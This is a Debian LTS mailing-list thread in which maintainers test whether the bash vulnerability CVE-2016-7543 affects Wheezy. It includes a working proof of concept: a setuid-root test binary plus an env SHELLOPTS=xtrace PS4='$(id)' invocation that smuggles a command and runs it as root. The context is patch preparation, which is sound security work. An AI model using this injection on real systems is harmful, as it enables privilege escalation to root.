Re: Wheezy update of bash?
Hi,
2016-10-07 8:10 GMT+02:00 Ola Lundqvist <ola@inguza.com>:
> Hi Balint
>
> Ah, it could be the default shell. I'll try that. Thanks for the suggestion.
>
> Merely that the command id is executed is not a reproduction. It has to be
> executed as another user than the one executing the binary to be a
> security problem. If not it could be a bug but not a security bug (privilege
> escalation).
True, but it works on setuid binaries, too:
root@debian-wheezy:/home/vagrant# ls -alh /bin/sh
lrwxrwxrwx 1 root root 4 Oct 7 07:16 /bin/sh -> bash
root@debian-wheezy:/home/vagrant# gcc -xc - -otest <<< 'int main() {
setuid(0); system("/bin/date"); }'
root@debian-wheezy:/home/vagrant# chmod 4755 ./test
root@debian-wheezy:/home/vagrant# ls -l ./test
-rwsr-xr-x 1 root root 6877 Oct 7 07:19 ./test
root@debian-wheezy:/home/vagrant# exit
exit
vagrant@debian-wheezy:~$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
uid=0(root) gid=1000(vagrant)
groups=0(root),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(vid/bin/date
Fri Oct 7 07:19:34 GMT 2016
vagrant@debian-wheezy:~$
Cheers,
Balint
>
> Best regards,
>
> // Ola
>
> On 7 October 2016 at 00:12, Bálint Réczey <balint@balintreczey.hu> wrote:
>>
>> Hi Ola,
>>
>> 2016-10-06 23:08 GMT+02:00 Ola Lundqvist <ola@inguza.com>:
>> > Hi Matthias and Balint
>> >
>> > I have tried to reproduce the problem described in the openwall email.
>> > However I can not reproduce it. Have you been able to?
>> >
>> > On wheezy:
>> > ------------
>> > ola@tigereye:/$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
>> > Thu Oct 6 20:54:07 UTC 2016
>> > ola@tigereye:/$ ls -la test
>> > -rwsr-xr-x 1 root root 6824 Oct 6 20:52 test
>> > ola@tigereye:/$ dpkg -l bash
>> > ...CUT...
>> > ii bash 4.2+dfsg-0.1 amd64 GNU Bourne Again SHell
>> >
>> > On jessie:
>> > ola@tigereye:~/exploit$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
>> > Thu Oct 6 22:48:35 CEST 2016
>>
>> When I set the default shell to bash it worked for me.
>> Please try with sudo dpkg-reconfigure dash.
>>
>> > ola@tigereye:~/exploit$ dpkg -l bash
>> > ...CUT...
>> > ii bash 4.3-11+b1 amd64 GNU Bourne Again SHell
>> >
>> > I think it may be because SHELLOPTS is a read-only variable.
>> >
>> > ola@tigereye:~/exploit$ SHELLOPTS=xtrace
>> > bash: SHELLOPTS: readonly variable
>> >
>> > Do you think I have made a mistake in the reproduction or is it so that the
>> > patch was actually not on a real problem (at least in Debian)?
>> >
>> > Not even if I change the code like this:
>> > ola@tigereye:~/exploit$ gcc -xc - -otest2 <<< 'int main() { setuid(0);
>> > system("/bin/bash -c /bin/date"); }'
>> > ola@tigereye:~/exploit$ ./test2
>> > Thu Oct 6 23:04:11 CEST 2016
>> > ola@tigereye:~/exploit$ set -x
>> > ola@tigereye:~/exploit$ ./test2
>> > uid=1000(ola) gid=1000(ola)
>> >
>> > groups=1000(ola),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)./test2
>> > Thu Oct 6 23:04:18 CEST 2016
>>
>> This runs the command passed in PS4 thus I consider this a reproduction.
>>
>> Cheers,
>> Balint
>>
>> >
>> > My conclusion is that there is no security hole. But I may be mistaken.
>> >
>> > Can anyone else reproduce the issue?
>> >
>> > Best regards,
>> >
>> > // Ola
>> >
>> > On 6 October 2016 at 12:29, Ola Lundqvist <ola@inguza.com> wrote:
>> >>
>> >> Hi Matthias
>> >>
>> >> I will look into this.
>> >>
>> >> // Ola
>> >>
>> >> On 6 October 2016 at 01:06, Matthias Klose <doko@debian.org> wrote:
>> >>>
>> >>> On 05.10.2016 16:02, Balint Reczey wrote:
>> >>> > Hello dear maintainer(s),
>> >>> >
>> >>> > the Debian LTS team would like to fix the security issues which are
>> >>> > currently open in the Wheezy version of bash:
>> >>> > https://security-tracker.debian.org/tracker/CVE-2016-7543
>> >>> >
>> >>> > Would you like to take care of this yourself?
>> >>>
>> >>> please go ahead.
>> >>>
>> >>> Matthias
>> >>>
>> >>
>> >>
>> >>
>> >> --
>> >> --- Inguza Technology AB --- MSc in Information Technology ----
>> >> / ola@inguza.com Folkebogatan 26 \
>> >> | opal@debian.org 654 68 KARLSTAD |
>> >> | http://inguza.com/ Mobile: +46 (0)70-332 1551 |
>> >> \ gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9 /
>> >> ---------------------------------------------------------------
>> >>
>> >
>> >
>> >
>> >
>
>
>
>
>